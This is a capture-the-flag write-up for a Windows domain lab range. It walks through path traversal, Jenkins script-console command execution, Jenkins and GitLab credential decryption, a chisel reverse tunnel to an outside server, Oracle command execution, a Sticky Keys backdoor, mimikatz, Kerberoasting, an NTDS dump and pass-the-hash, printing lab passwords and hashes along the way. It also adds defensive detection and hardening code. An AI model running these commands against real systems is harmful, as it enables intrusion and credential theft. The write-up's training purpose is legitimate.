[春秋云境 (Chunqiu Cloud Range)] Privilege simulation scenario

Published: 2025-05-20 ⋅ Views: 16 ⋅ Likes: 0

Target description:

In this range you play a senior hacker hired to assess the network security of the fictional company XR Shop. You need to break the company's internet-facing applications one by one through penetration testing, use post-exploitation techniques to go deeper into XR Shop's internal network, look for weaknesses and vulnerabilities, abuse Windows privileges to obtain administrator rights, and finally obtain the core secrets hidden inside. The range has 4 flags spread across different hosts.

Topics covered

  • Information disclosure
  • Jenkins initial admin password
  • Jenkins back-end RCE
  • GitLab API token
  • Oracle RCE
  • SeRestorePrivilege privilege escalation
  • SPN
  • Extracting the SAM via volume shadow copy

Information provided by the challenge

Stage 1

Obtain the backup of the XR Shop website source code and try to gain arbitrary file read on the system. The administrator also kept the initial admin password when configuring Jenkins; try to read that password and take control of the Jenkins server. The Jenkins configuration directory is C:\ProgramData\Jenkins\.jenkins.

Stage 2

The administrator configured GitLab for Jenkins. Try to obtain the GitLab API token and ultimately access the sensitive repositories in GitLab. With the sensitive information, try to connect to the Oracle database and take control of the ORACLE server.

Stage 3

Attack the office intranet, take control of an office PC, and escalate to SYSTEM through privilege abuse.

Stage 4

Try to take over the backup operator account, dump NTDS to obtain domain administrator privileges, and finally control the whole domain.

Background

Volume Shadow Copy (VSS)

Using SeBackupPrivilege to read protected system files through a volume shadow copy

  • VSS is a Windows feature for creating file-system snapshots, including files that are currently in use.

  • SeBackupPrivilege lets a user create shadow copies and access the files in the snapshot, even when those files are normally locked or restricted by ACLs.

  • Through VSS a copy of the SAM file can be read without accessing the original file directly.

General procedure

  1. Create and upload the shadow-copy script

Create raj.dsh locally with the following content:

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

What the script does: create a shadow copy of drive C: and mount it as drive Z:

set context persistent nowriters

  • Make the shadow copy persistent, so the snapshot is not deleted automatically when the script finishes
  • nowriters: avoid interference from write activity during the backup (for example database files being modified)

add volume c: alias raj

  • Select drive C: as the target of the shadow copy and give the snapshot the alias raj.

create

  • Perform the creation, producing the snapshot of drive C:.

expose %raj% z:

  • Mount the snapshot as drive Z:, allowing access to the snapshot's file system.

Convert the line endings with unix2dos

unix2dos raj.dsh

unix2dos converts the script's line endings from Unix style (LF) to Windows style (CRLF), so the script runs correctly on Windows.

  2. Run the shadow copy

diskshadow /s raj.dsh

Run the diskshadow tool with the raj.dsh script to create the shadow copy of drive C: and mount it as Z:

  3. Copy the file (for example ntds.dit on the domain controller)

RoboCopy /b z:\windows\ntds . ntds.dit

Use RoboCopy in backup mode (/b) to copy ntds.dit from the Z:\Windows\NTDS directory of the shadow copy (drive Z:) into the current directory

RoboCopy: Windows' advanced file-copy tool, with support for backup mode and ACL handling.

/b: backup mode, which uses SeBackupPrivilege to bypass file ACLs and locks so that protected files can be copied

z:\windows\ntds: source path

.: the current directory

ntds.dit: the specific file to copy

ntds.dit is the core Active Directory database; it stores information on every object in the domain, including:

  • User accounts (user names, SIDs, NTLM hashes, Kerberos keys, etc.)
  • Computer accounts
  • Groups and permission information
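
Added example from the defender's side (not code from the original write-up): Python detection logic that runs the steps above against constructed process-creation log lines (Sysmon Event ID 1 style, flattened to one line each) and rates a host high only when shadow-copy creation, a backup-mode copy touching NTDS, or a hive save cluster together; host names, users and timestamps are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 style, flattened
# to "time|host|user|image|commandline").  The XR-DC lines mirror the chain
# described above; the other two are benign look-alikes.
SAMPLE_EVENTS = r"""
2025-05-14T02:10:03|XR-DC|XIAORANG\tianjing|C:\Windows\System32\diskshadow.exe|diskshadow /s raj.dsh
2025-05-14T02:10:41|XR-DC|XIAORANG\tianjing|C:\Windows\System32\Robocopy.exe|RoboCopy /b z:\windows\ntds . ntds.dit
2025-05-14T02:12:15|XR-DC|XIAORANG\tianjing|C:\Windows\System32\reg.exe|reg save HKLM\SYSTEM system
2025-05-14T03:00:00|XR-JENKINS|XR-JENKINS\backupsvc|C:\Windows\System32\Robocopy.exe|robocopy D:\www E:\backup\www /MIR /B
2025-05-14T03:30:00|XR-0923|XIAORANG\zhangshuai|C:\Windows\System32\reg.exe|reg query HKLM\SOFTWARE\Microsoft
"""

# Detection rules, each a regex applied to the lower-cased command line.
RULES = [
    ("diskshadow_script",   re.compile(r"diskshadow(\.exe)?\s+/s\b")),
    ("vssadmin_shadow",     re.compile(r"vssadmin(\.exe)?\s+create\s+shadow")),
    ("robocopy_backupmode", re.compile(r"robocopy(\.exe)?\b.*\s/b\b")),
    ("ntds_access",         re.compile(r"\\ntds\b|ntds\.dit")),
    ("hive_save",           re.compile(r"reg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b")),
]


def parse_events(text: str) -> List[dict]:
    """Split the flattened log into event dicts (blank lines are ignored)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, image, cmdline = line.split("|", 4)
        events.append({"time": datetime.fromisoformat(ts), "host": host,
                       "user": user, "image": image, "cmdline": cmdline})
    return events


def match_rules(event: dict) -> List[str]:
    """Names of every rule that fires on one event's command line."""
    cmd = event["cmdline"].lower()
    return [name for name, rx in RULES if rx.search(cmd)]


def correlate(events: List[dict], window: timedelta = timedelta(minutes=15)) -> List[dict]:
    """Per host, gather every rule hit inside `window` of that host's first hit.
    Two or more distinct rules (shadow creation followed by a backup-mode copy
    or a hive save) is the dump chain and is rated high; a single rule, such as
    a scheduled backup job using robocopy /B, is only noted as low."""
    per_host: Dict[str, List[dict]] = defaultdict(list)
    for ev in events:
        hits = match_rules(ev)
        if hits:
            per_host[ev["host"]].append({**ev, "hits": hits})
    alerts = []
    for host, hs in per_host.items():
        hs.sort(key=lambda e: e["time"])
        first = hs[0]["time"]
        rules = set()
        for h in hs:
            if h["time"] - first <= window:
                rules.update(h["hits"])
        alerts.append({"host": host, "user": hs[0]["user"],
                       "rules": sorted(rules),
                       "severity": "high" if len(rules) >= 2 else "low"})
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse_events(SAMPLE_EVENTS)):
        print(alert["severity"].upper(), alert["host"], alert["user"],
              ", ".join(alert["rules"]))
```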

External network

Arbitrary file read

Scan with fscan

The WordPress site on port 80 has a source-code leak. Download it and audit it: there is an arbitrary file read vulnerability with no filtering at all.
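
As an added illustration (not code from the write-up or from the leaked site), the following Python models the check that is missing around the logfile parameter of content-log.php: the vulnerable join beside a hardened resolver that keeps the result inside the log directory, using ntpath so the mixed ../ and \ separators of the payloads below are handled on any OS. LOG_DIR is an assumed log root, not a path from the page.

```python
import ntpath
from typing import Optional

# Hypothetical log root of the vulnerable endpoint (assumption; the page does
# not show the real directory layout of the site).
LOG_DIR = r"C:\xampp\htdocs\wp-content\logs"


def vulnerable_resolve(logfile: str) -> str:
    """Models what the leaked content-log.php effectively does: the parameter is
    joined to the log directory with no validation, so ../ sequences walk out of
    it and any file the web server can read is returned."""
    return ntpath.normpath(ntpath.join(LOG_DIR, logfile))


def safe_resolve(logfile: str) -> Optional[str]:
    """Hardened variant: returns the resolved path only if it stays inside
    LOG_DIR, otherwise None.  ntpath applies Windows semantics (both '/' and
    '\\' as separators, drive letters, UNC prefixes) regardless of host OS."""
    if not logfile or "\x00" in logfile:
        return None
    resolved = ntpath.normpath(ntpath.join(LOG_DIR, logfile))
    try:
        # commonpath compares case-insensitively and raises ValueError when the
        # paths are on different drives or one of them is a UNC path.
        if ntpath.commonpath([LOG_DIR, resolved]) != LOG_DIR:
            return None
    except ValueError:
        return None
    if resolved == LOG_DIR:  # "." or ".." chains that land on the directory itself
        return None
    return resolved


def strict_resolve(logfile: str) -> Optional[str]:
    """Stricter alternative: accept only a bare file name ending in .log."""
    if ntpath.basename(logfile) != logfile or not logfile.endswith(".log"):
        return None
    return ntpath.join(LOG_DIR, logfile)


if __name__ == "__main__":
    probe = r"../../../../../../../../../Users\Administrator\flag\flag01.txt"
    print("vulnerable:", vulnerable_resolve(probe))
    print("hardened:  ", safe_resolve(probe))
    print("normal:    ", safe_resolve("access.log"))
```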

Try to read the flag (it can also be grabbed directly after the RDP login later)

/tools/content-log.php?logfile=../../../../../../../../../Users\Administrator\flag\flag01.txt

Following the stage 1 hint, read the Jenkins password; the hint says the Jenkins configuration directory is C:\ProgramData\Jenkins\.jenkins

In Jenkins' default setup, the initial admin password is stored in the initialAdminPassword file inside the secrets subdirectory of the Jenkins configuration directory

So the file to read is C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword

/tools/content-log.php?logfile=../../../../../../../../../ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword

Password obtained: 510235cf43f14e83b88a9f144199655b

Jenkins admin console

With the password, log in on port 8080 (fscan finds it)

admin / 510235cf43f14e83b88a9f144199655b

Under the manage/script path Jenkins provides a script console that lets administrators run script code on the Jenkins instance; the usual language is Groovy, and it can also execute shell commands

http://39.99.129.242:8080/manage/script

The privileges are very high

Add an administrator user to make RDP login easy

println("net user xpw 123qwe! /add".execute().text)
println("net localgroup administrators xpw /add".execute().text)

RDP remote login

Upload fscan and scan the internal network (the Windows Remote Desktop client shares the local C: drive by default; just put the tools there)

[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.7     存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.11    存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.16    存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.31    存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.46    存活 (ICMP)
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.7
主机名: XR-JENKINS
发现的网络接口:
   IPv4地址:
      └─ 172.22.14.7
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.7        状态码:200 长度:54603  标题:XR SHOP
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.46       状态码:200 长度:703    标题:IIS Windows Server
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.31
主机名: XR-ORACLE
发现的网络接口:
   IPv4地址:
      └─ 172.22.14.31
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.11
主机名: XR-DC
发现的网络接口:
   IPv4地址:
      └─ 172.22.14.11
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.7:8080   状态码:403 长度:548    标题:无标题
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.46
主机名: XR-0923
发现的网络接口:
   IPv4地址:
      └─ 172.22.14.46
[2025-05-14 01:23:21] [SUCCESS] NetBios 172.22.14.46    XIAORANG\XR-0923
[2025-05-14 01:23:21] [SUCCESS] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE
[2025-05-14 01:23:21] [SUCCESS] NetBios 172.22.14.11    DC:XIAORANG\XR-DC
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.16       状态码:302 长度:99     标题:无标题 重定向地址: http://172.22.14.16/users/sign_in
[2025-05-14 01:23:22] [SUCCESS] 网站标题 http://172.22.14.16:8060  状态码:404 长度:555    标题:404 Not Found
[2025-05-14 01:23:27] [SUCCESS] 检测到漏洞 http://172.22.14.7:80/www.zip poc-yaml-backup-file 参数:[{path www} {ext zip}]
172.22.14.7 	this host, already have full privileges
172.22.14.46 	XIAORANG\XR-0923
172.22.14.11	DC:XIAORANG\XR-DC
172.22.14.31 	WORKGROUP\XR-ORACLE
172.22.14.16 	GitLab

GitLab apiToken

According to the challenge description:

The administrator configured GitLab for Jenkins. Try to obtain the GitLab API token and ultimately access the sensitive repositories in GitLab. With the sensitive information, try to connect to the Oracle database and take control of the ORACLE server.

Look for the API token by going through the files under the Jenkins configuration directory

C:/ProgramData/Jenkins/.jenkins/credentials.xml
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0">
          <scope>GLOBAL</scope>
          <id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
          <description></description>
          <apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
        </com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

The apiToken can be found in this file

AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh

Go back to the Jenkins script console to decrypt it; see "How to decrypt Jenkins passwords from credentials.xml - bestsrc"

println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

Plaintext obtained:

glpat-7kD_qLH2PiQv_ywB9hz2

This token can now be used to access information in GitLab

Internal network

Setting up a proxy

First set up a proxy with chisel

Server (VPS)

./chisel server -p 8888 --reverse

Client (compromised host)

chisel.exe client 8.154.17.163:8888 R:0.0.0.0:9383:socks

Oracle RCE

List the projects the token has access to via the API

proxychains4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"

Clone some of the projects and take a look

proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git

proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git

proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git

xradmin/ruoyi-admin/src/main/resources/application-druid.yml contains the Oracle account and password

You can connect to the database with Navicat to look around; some errors may come up, which this article resolves:
https://blog.csdn.net/qq_38974638/article/details/115069664

Connecting is not actually necessary, though: odat can execute commands directly, because the xradmin user has SYSDBA privileges

odat is an open-source tool dedicated to penetration testing Oracle databases

Add an administrator account to make the RDP connection easy

proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user xpw 123qwe! /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators xpw /add'

dbmsscheduler is an odat module that uses Oracle's DBMS_SCHEDULER package; the package allows creating scheduled jobs, and those jobs can run shell commands on the database server (given sufficient privileges)

-s: the database server
-p: the port
-d: the database SID (system identifier) or service name
--sysdba: connect with SYSDBA privileges; SYSDBA is a highly privileged Oracle role that grants full administrative access to the database and usually the ability to run operating-system commands.
--exec: the shell command to execute

After adding the administrator account, connect directly over RDP

proxychains4 xfreerdp /u:xpw /p:123qwe!  /v:172.22.14.31 /drive:share,/mnt/xpw/kali_shard

The flag can be read directly

SeRestorePrivilege privilege escalation

The projects cloned earlier also contain a file that stores many accounts

internal-secret/credentials.txt

It contains credentials for an account on XR-0923, a host the earlier fscan intranet scan found

172.22.14.46 	XIAORANG\XR-0923

RDP in with this user (insufficient privileges to read the flag)

proxychains4 xfreerdp /u:zhangshuai /p:wSbEajHzZs  /v:172.22.14.46 /drive:share,/mnt/xpw/kali_shard

Look at some information about this user

whoami /priv # list the user's privileges
net user zhangshuai # show detailed information about the user

The user turns out to be in the Remote Management Users group

Remote management is possible over the WinRM protocol, and evil-winrm is a tool built on exactly that. By default WinRM uses port 5985 (HTTP) or 5986 (HTTPS); the system has the corresponding port open, so evil-winrm can be used to connect

Connect with evil-winrm

proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

The user turns out to have a few more privileges in this session

SeRestorePrivilege is among them.

SeRestorePrivilege is a high-privilege right that lets a user bypass the access control lists (ACLs) on files and the registry and modify system files or edit the registry directly

We can rename cmd.exe to sethc.exe. sethc.exe is part of Windows accessibility: when the user presses Shift five times at the lock screen, the system runs sethc.exe (the Sticky Keys program) with SYSTEM privileges. With cmd.exe disguised as sethc.exe, a command prompt can be triggered from the lock screen and runs as SYSTEM, completing the escalation

cd C:\Windows\System32
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe

Change to C:\Windows\System32, which holds many critical executables
ren renames a file

After that, log in again over RDP

proxychains4 xfreerdp /u:zhangshuai /p:wSbEajHzZs  /v:172.22.14.46 /drive:share,/mnt/xpw/kali_shard

Lock the session to get to the logon screen, then press Shift 5 times to trigger Sticky Keys, which runs the cmd.exe disguised as sethc.exe, with SYSTEM privileges

Add an administrator account for RDP login: the zhangshuai account is only a normal user and lacks many permissions, so an admin user is needed

type C:\Users\Administrator\flag\flag03.txt
net user xpw 123qwe! /add
net localgroup administrators xpw /add

Then RDP in as the newly added administrator

proxychains4 xfreerdp /u:xpw /p:123qwe!  /v:172.22.14.46 /drive:share,/mnt/xpw/kali_shard

mimikatz

Upload mimikatz and dump the user hashes

privilege::debug
sekurlsa::logonpasswords

The NTLM hash of the machine account can be captured

31e653ce951ba9faaefbc64dcc6126f1 

SPN

Using the NTLM hash of XR-0923$ to look up SPNs turns up a tianjing user

proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':31e653ce951ba9faaefbc64dcc6126f1' -dc-ip 172.22.14.11

Request the TGS ticket for the tianjing user

proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':31e653ce951ba9faaefbc64dcc6126f1' -dc-ip 172.22.14.11 -request-user tianjing

Save the ticket hash to hash.txt and crack the plaintext offline

hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

Cracked plaintext: DPQSXSXgh2

Extracting the SAM via shadow copy

Connect with evil-winrm

proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 

The SeBackupPrivilege and SeRestorePrivilege privileges are present

With the right to back up and restore files or directories, we can make a shadow copy and then download the ntds.dit file
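
Added example (not code from the write-up): a small Python audit of whoami /priv output, the check this write-up runs on XR-0923 over RDP and again over WinRM, and which applies equally to the DC session here. It parses the table, flags ACL-bypassing privileges such as SeBackupPrivilege and SeRestorePrivilege, and diffs two captures to show what a logon type added. The two sample outputs are constructed, not copied from the range.

```python
from typing import Dict, List, Set

# Privileges worth flagging in a non-administrator session.  "Disabled" still
# counts: a process that holds a privilege can enable it at will.  The
# one-line descriptions are this example's summaries, not Microsoft's text.
RISKY_PRIVILEGES = {
    "SeBackupPrivilege": "read any file through backup semantics / shadow copies",
    "SeRestorePrivilege": "write any file or registry key (e.g. replace sethc.exe)",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate client tokens",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

# Constructed `whoami /priv` output for the two logons the write-up compares
# (the same user first over RDP, then over WinRM); values are illustrative.
RDP_SESSION = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
"""

WINRM_SESSION = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeBackupPrivilege             Back up files and directories        Disabled
SeRestorePrivilege            Restore files and directories        Disabled
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
"""


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Return {privilege name: state}.  Data rows start with 'Se' and end with
    the State column; the banner, header and '====' rows are skipped."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split()
        if (len(parts) >= 3 and parts[0].startswith("Se")
                and parts[-1] in ("Enabled", "Disabled")):
            privs[parts[0]] = parts[-1]
    return privs


def risky(privs: Dict[str, str]) -> List[str]:
    """Sorted names of the held privileges that appear in RISKY_PRIVILEGES."""
    return sorted(p for p in privs if p in RISKY_PRIVILEGES)


def compare_sessions(before: str, after: str) -> Dict[str, Set[str]]:
    """Privileges gained and lost between two `whoami /priv` captures."""
    a, b = set(parse_whoami_priv(before)), set(parse_whoami_priv(after))
    return {"gained": b - a, "lost": a - b}


if __name__ == "__main__":
    for name, output in (("RDP", RDP_SESSION), ("WinRM", WINRM_SESSION)):
        held = parse_whoami_priv(output)
        for p in risky(held):
            print(f"[{name}] {p} ({held[p]}): {RISKY_PRIVILEGES[p]}")
    print("gained over WinRM:",
          sorted(compare_sessions(RDP_SESSION, WINRM_SESSION)["gained"]))
```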

Create a raj.dsh locally with the following content

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

Then convert the line endings with unix2dos raj.dsh

In the evil-winrm session from before, change to the C: drive, create a test folder and change into it (otherwise there will be permission problems later), then upload the local raj.dsh

mkdir test
cd test
upload raj.dsh

diskshadow /s raj.dsh

Copy it into the current directory, i.e. the test directory we created

RoboCopy /b z:\windows\ntds . ntds.dit

Download ntds.dit (this is rather slow)

download ntds.dit

Next download the SYSTEM hive (this uses SeRestorePrivilege)

reg save HKLM\SYSTEM system
download system

Finally decrypt locally with the downloaded ntds.dit and system files

impacket-secretsdump -ntds ntds.dit -system system local

70c39b547b7d8adec35ad7c09fb1d277

Pass-the-hash to take the domain controller

proxychains4 impacket-smbexec -hashes :70c39b547b7d8adec35ad7c09fb1d277 xiaorang.lab/administrator@172.22.14.11 -codec gbk

or

proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"

References

https://fushuling.com/index.php/2023/10/10/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7privilege/
https://zer0peach.github.io/2024/12/27/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-privilege-writeup/